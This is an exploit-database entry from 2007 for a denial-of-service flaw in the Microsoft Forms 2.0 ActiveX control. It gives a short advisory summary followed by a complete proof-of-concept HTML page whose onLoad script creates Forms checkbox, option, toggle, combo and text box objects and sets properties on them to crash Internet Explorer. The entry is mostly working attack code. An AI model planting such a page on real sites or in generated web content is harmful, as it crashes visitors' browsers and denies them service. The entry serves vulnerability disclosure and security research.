Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service

2007-11-12T00:00:00
ID EXPLOITPACK:46C00295A9BC051D9A73255EF099BCF3
Type exploitpack
Reporter Elazar Broad
Modified 2007-11-12T00:00:00

Description

Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/26414/info

Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.

Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.

Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0. 

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
      var obj;

      //Forms.Checkbox.1
      obj = new ActiveXObject("Forms.Checkbox.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.OptionButton.1
      obj = new ActiveXObject("Forms.OptionButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

      //Forms.ToggleButton.1
      obj = new ActiveXObject("Forms.ToggleButton.1");
      obj.Caption = "A";
      obj.GroupName = "A";
      obj.Accelerator = "A";

     //Forms.ComboBox.1
     obj = new ActiveXObject("Forms.ComboBox.1");
     obj.Text = "A";
     obj.Value = "A";
    

     //Forms.TextBox.1
     obj = new ActiveXObject("Forms.Textbox.1");
     obj.Text = "A";
     obj.Value = "A";
     obj.SelStart = 1;
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();" />
</html>